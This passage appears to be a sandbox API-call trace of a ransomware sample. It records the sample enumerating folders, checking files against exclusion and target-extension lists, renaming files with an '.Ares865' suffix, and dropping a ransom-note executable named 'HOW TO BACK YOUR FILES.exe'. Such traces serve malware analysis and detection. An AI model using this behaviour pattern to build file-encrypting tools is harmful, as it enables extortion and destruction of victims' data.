[0085.451] lstrlenW (lpString="rod") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="rod") returned 1 [0085.452] lstrlenW (lpString="rodx") returned 4 [0085.452] lstrcmpiW (lpString1=".sdf", lpString2="rodx") returned -1 [0085.452] lstrlenW (lpString="rpd") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="rpd") returned 1 [0085.452] lstrlenW (lpString="rsd") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="rsd") returned 1 [0085.452] lstrlenW (lpString="sas7bdat") returned 8 [0085.452] lstrcmpiW (lpString1="base.sdf", lpString2="sas7bdat") returned -1 [0085.452] lstrlenW (lpString="sbf") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="sbf") returned 1 [0085.452] lstrlenW (lpString="scx") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="scx") returned 1 [0085.452] lstrlenW (lpString="sdb") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="sdb") returned 1 [0085.452] lstrlenW (lpString="sdc") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="sdc") returned 1 [0085.452] lstrlenW (lpString="sdf") returned 3 [0085.452] lstrcmpiW (lpString1="sdf", lpString2="sdf") returned 0 [0085.452] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="aoldtz.exe") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="..") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="windows") returned -1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="bootmgr") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="temp") returned -1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="pagefile.sys") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="boot") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="ids.txt") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="ntuser.dat") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="perflogs") returned 1 [0085.452] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="MSBuild") returned 1 [0085.452] lstrlenW (lpString="RacMetaData.dat") returned 15 [0085.452] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 58 [0085.452] lstrcpyW (in: lpString1=0x2cce456, lpString2="RacMetaData.dat" | out: lpString1="RacMetaData.dat") returned="RacMetaData.dat" [0085.452] lstrlenW (lpString="RacMetaData.dat") returned 15 [0085.452] lstrlenW (lpString="Ares865") returned 7 [0085.452] lstrcmpiW (lpString1="ata.dat", lpString2="Ares865") returned 1 [0085.453] lstrlenW (lpString=".dll") returned 4 [0085.453] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".dll") returned 1 [0085.453] lstrlenW (lpString=".lnk") returned 4 [0085.453] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".lnk") returned 1 [0085.453] lstrlenW (lpString=".ini") returned 4 [0085.453] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".ini") returned 1 [0085.453] lstrlenW (lpString=".sys") returned 4 [0085.453] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".sys") returned 1 [0085.453] lstrlenW (lpString="RacMetaData.dat") returned 15 [0085.453] lstrlenW (lpString="bak") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0085.453] lstrlenW (lpString="ba_") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0085.453] lstrlenW (lpString="dbb") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0085.453] lstrlenW (lpString="vmdk") returned 4 [0085.453] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0085.453] lstrlenW (lpString="rar") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0085.453] lstrlenW (lpString="zip") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0085.453] lstrlenW (lpString="tgz") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0085.453] lstrlenW (lpString="vbox") returned 4 [0085.453] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0085.453] lstrlenW (lpString="vdi") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0085.453] lstrlenW (lpString="vhd") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0085.453] lstrlenW (lpString="vhdx") returned 4 [0085.453] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0085.453] lstrlenW (lpString="avhd") returned 4 [0085.453] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0085.453] lstrlenW (lpString="db") returned 2 [0085.453] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0085.453] lstrlenW (lpString="db2") returned 3 [0085.453] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0085.453] lstrlenW (lpString="db3") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0085.454] lstrlenW (lpString="dbf") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0085.454] lstrlenW (lpString="mdf") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0085.454] lstrlenW (lpString="mdb") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0085.454] lstrlenW (lpString="sql") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0085.454] lstrlenW (lpString="sqlite") returned 6 [0085.454] lstrcmpiW (lpString1="ta.dat", lpString2="sqlite") returned 1 [0085.454] lstrlenW (lpString="sqlite3") returned 7 [0085.454] lstrcmpiW (lpString1="ata.dat", lpString2="sqlite3") returned -1 [0085.454] lstrlenW (lpString="sqlitedb") returned 8 [0085.454] lstrcmpiW (lpString1="Data.dat", lpString2="sqlitedb") returned -1 [0085.454] lstrlenW (lpString="xml") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0085.454] lstrlenW (lpString="$er") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0085.454] lstrlenW (lpString="4dd") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0085.454] lstrlenW (lpString="4dl") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0085.454] lstrlenW (lpString="^^^") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0085.454] lstrlenW (lpString="abs") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0085.454] lstrlenW (lpString="abx") returned 3 [0085.454] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0085.454] lstrlenW (lpString="accdb") returned 5 [0085.454] lstrcmpiW (lpString1="a.dat", lpString2="accdb") returned -1 [0085.454] lstrlenW (lpString="accdc") returned 5 [0085.454] lstrcmpiW (lpString1="a.dat", lpString2="accdc") returned -1 [0085.454] lstrlenW (lpString="accde") returned 5 [0085.454] lstrcmpiW (lpString1="a.dat", lpString2="accde") returned -1 [0085.454] lstrlenW (lpString="accdr") returned 5 [0085.454] lstrcmpiW (lpString1="a.dat", lpString2="accdr") returned -1 [0085.454] lstrlenW (lpString="accdt") returned 5 [0085.455] lstrcmpiW (lpString1="a.dat", lpString2="accdt") returned -1 [0085.455] lstrlenW (lpString="accdw") returned 5 [0085.455] lstrcmpiW (lpString1="a.dat", lpString2="accdw") returned -1 [0085.455] lstrlenW (lpString="accft") returned 5 [0085.455] lstrcmpiW (lpString1="a.dat", lpString2="accft") returned -1 [0085.455] lstrlenW (lpString="adb") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0085.455] lstrlenW (lpString="adb") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0085.455] lstrlenW (lpString="ade") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0085.455] lstrlenW (lpString="adf") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0085.455] lstrlenW (lpString="adn") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0085.455] lstrlenW (lpString="adp") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0085.455] lstrlenW (lpString="alf") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0085.455] lstrlenW (lpString="ask") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0085.455] lstrlenW (lpString="btr") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0085.455] lstrlenW (lpString="cat") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0085.455] lstrlenW (lpString="cdb") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0085.455] lstrlenW (lpString="ckp") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0085.455] lstrlenW (lpString="cma") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0085.455] lstrlenW (lpString="cpd") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0085.455] lstrlenW (lpString="dacpac") returned 6 [0085.455] lstrcmpiW (lpString1="ta.dat", lpString2="dacpac") returned 1 [0085.455] lstrlenW (lpString="dad") returned 3 [0085.455] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0085.455] lstrlenW (lpString="dadiagrams") returned 10 [0085.456] lstrcmpiW (lpString1="taData.dat", lpString2="dadiagrams") returned 1 [0085.456] lstrlenW (lpString="daschema") returned 8 [0085.456] lstrcmpiW (lpString1="Data.dat", lpString2="daschema") returned 1 [0085.456] lstrlenW (lpString="db-journal") returned 10 [0085.456] lstrcmpiW (lpString1="taData.dat", lpString2="db-journal") returned 1 [0085.456] lstrlenW (lpString="db-shm") returned 6 [0085.456] lstrcmpiW (lpString1="ta.dat", lpString2="db-shm") returned 1 [0085.456] lstrlenW (lpString="db-wal") returned 6 [0085.456] lstrcmpiW (lpString1="ta.dat", lpString2="db-wal") returned 1 [0085.456] lstrlenW (lpString="dbc") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0085.456] lstrlenW (lpString="dbs") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0085.456] lstrlenW (lpString="dbt") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0085.456] lstrlenW (lpString="dbv") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0085.456] lstrlenW (lpString="dbx") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0085.456] lstrlenW (lpString="dcb") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0085.456] lstrlenW (lpString="dct") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0085.456] lstrlenW (lpString="dcx") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0085.456] lstrlenW (lpString="ddl") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0085.456] lstrlenW (lpString="dlis") returned 4 [0085.456] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0085.456] lstrlenW (lpString="dp1") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0085.456] lstrlenW (lpString="dqy") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0085.456] lstrlenW (lpString="dsk") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0085.456] lstrlenW (lpString="dsn") returned 3 [0085.456] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0085.456] lstrlenW (lpString="dtsx") returned 4 [0085.457] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0085.457] lstrlenW (lpString="dxl") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0085.457] lstrlenW (lpString="eco") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0085.457] lstrlenW (lpString="ecx") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0085.457] lstrlenW (lpString="edb") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0085.457] lstrlenW (lpString="epim") returned 4 [0085.457] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0085.457] lstrlenW (lpString="fcd") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0085.457] lstrlenW (lpString="fdb") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0085.457] lstrlenW (lpString="fic") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0085.457] lstrlenW (lpString="flexolibrary") returned 12 [0085.457] lstrcmpiW (lpString1="MetaData.dat", lpString2="flexolibrary") returned 1 [0085.457] lstrlenW (lpString="fm5") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0085.457] lstrlenW (lpString="fmp") returned 3 [0085.457] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0085.457] lstrlenW (lpString="fmp12") returned 5 [0085.457] lstrcmpiW (lpString1="a.dat", lpString2="fmp12") returned -1 [0085.457] lstrlenW (lpString="fmpsl") returned 5 [0085.457] lstrcmpiW (lpString1="a.dat", lpString2="fmpsl") returned -1 [0085.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 66 [0085.458] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0085.458] GetLastError () returned 0x20 [0085.458] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 88 [0085.458] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 88 [0085.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0085.458] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4731 [0085.458] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x58, lpOverlapped=0x0) returned 1 [0085.458] CloseHandle (hObject=0x118) returned 1 [0085.458] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0085.458] CloseHandle (hObject=0x0) returned 0 [0085.458] CloseHandle (hObject=0x0) returned 0 [0085.458] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0085.459] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.459] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0085.459] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" [0085.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0085.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0085.459] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned 46 [0085.459] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" [0085.459] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.459] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.459] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.459] GetLastError () returned 0x0 [0085.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.460] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.460] CloseHandle (hObject=0x120) returned 1 [0085.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.460] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.460] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.460] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.460] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.460] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.460] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.460] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.460] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.460] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.460] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.460] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c59d4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.460] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.460] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="aoldtz.exe") returned 1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".") returned 1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="..") returned 1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="windows") returned -1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="bootmgr") returned 1 [0085.460] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="temp") returned -1 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="pagefile.sys") returned 1 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="boot") returned 1 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="ids.txt") returned 1 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="ntuser.dat") returned 1 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="perflogs") returned 1 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="MSBuild") returned 1 [0085.461] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0085.461] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*") returned 48 [0085.461] lstrcpyW (in: lpString1=0x2cce45e, lpString2="RacWmiDatabase.sdf" | out: lpString1="RacWmiDatabase.sdf") returned="RacWmiDatabase.sdf" [0085.461] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0085.461] lstrlenW (lpString="Ares865") returned 7 [0085.461] lstrcmpiW (lpString1="ase.sdf", lpString2="Ares865") returned 1 [0085.461] lstrlenW (lpString=".dll") returned 4 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".dll") returned 1 [0085.461] lstrlenW (lpString=".lnk") returned 4 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".lnk") returned 1 [0085.461] lstrlenW (lpString=".ini") returned 4 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".ini") returned 1 [0085.461] lstrlenW (lpString=".sys") returned 4 [0085.461] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".sys") returned 1 [0085.461] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0085.461] lstrlenW (lpString="bak") returned 3 [0085.461] lstrcmpiW (lpString1="sdf", lpString2="bak") returned 1 [0085.461] lstrlenW (lpString="ba_") returned 3 [0085.461] lstrcmpiW (lpString1="sdf", lpString2="ba_") returned 1 [0085.461] lstrlenW (lpString="dbb") returned 3 [0085.461] lstrcmpiW (lpString1="sdf", lpString2="dbb") returned 1 [0085.461] lstrlenW (lpString="vmdk") returned 4 [0085.461] lstrcmpiW (lpString1=".sdf", lpString2="vmdk") returned -1 [0085.461] lstrlenW (lpString="rar") returned 3 [0085.461] lstrcmpiW (lpString1="sdf", lpString2="rar") returned 1 [0085.461] lstrlenW (lpString="zip") returned 3 [0085.461] lstrcmpiW (lpString1="sdf", lpString2="zip") returned -1 [0085.461] lstrlenW (lpString="tgz") returned 3 [0085.461] lstrcmpiW (lpString1="sdf", lpString2="tgz") returned -1 [0085.461] lstrlenW (lpString="vbox") returned 4 [0085.461] lstrcmpiW (lpString1=".sdf", lpString2="vbox") returned -1 [0085.462] lstrlenW (lpString="vdi") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="vdi") returned -1 [0085.462] lstrlenW (lpString="vhd") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="vhd") returned -1 [0085.462] lstrlenW (lpString="vhdx") returned 4 [0085.462] lstrcmpiW (lpString1=".sdf", lpString2="vhdx") returned -1 [0085.462] lstrlenW (lpString="avhd") returned 4 [0085.462] lstrcmpiW (lpString1=".sdf", lpString2="avhd") returned -1 [0085.462] lstrlenW (lpString="db") returned 2 [0085.462] lstrcmpiW (lpString1="df", lpString2="db") returned 1 [0085.462] lstrlenW (lpString="db2") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="db2") returned 1 [0085.462] lstrlenW (lpString="db3") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="db3") returned 1 [0085.462] lstrlenW (lpString="dbf") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="dbf") returned 1 [0085.462] lstrlenW (lpString="mdf") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="mdf") returned 1 [0085.462] lstrlenW (lpString="mdb") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="mdb") returned 1 [0085.462] lstrlenW (lpString="sql") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="sql") returned -1 [0085.462] lstrlenW (lpString="sqlite") returned 6 [0085.462] lstrcmpiW (lpString1="se.sdf", lpString2="sqlite") returned -1 [0085.462] lstrlenW (lpString="sqlite3") returned 7 [0085.462] lstrcmpiW (lpString1="ase.sdf", lpString2="sqlite3") returned -1 [0085.462] lstrlenW (lpString="sqlitedb") returned 8 [0085.462] lstrcmpiW (lpString1="base.sdf", lpString2="sqlitedb") returned -1 [0085.462] lstrlenW (lpString="xml") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="xml") returned -1 [0085.462] lstrlenW (lpString="$er") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="$er") returned 1 [0085.462] lstrlenW (lpString="4dd") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", 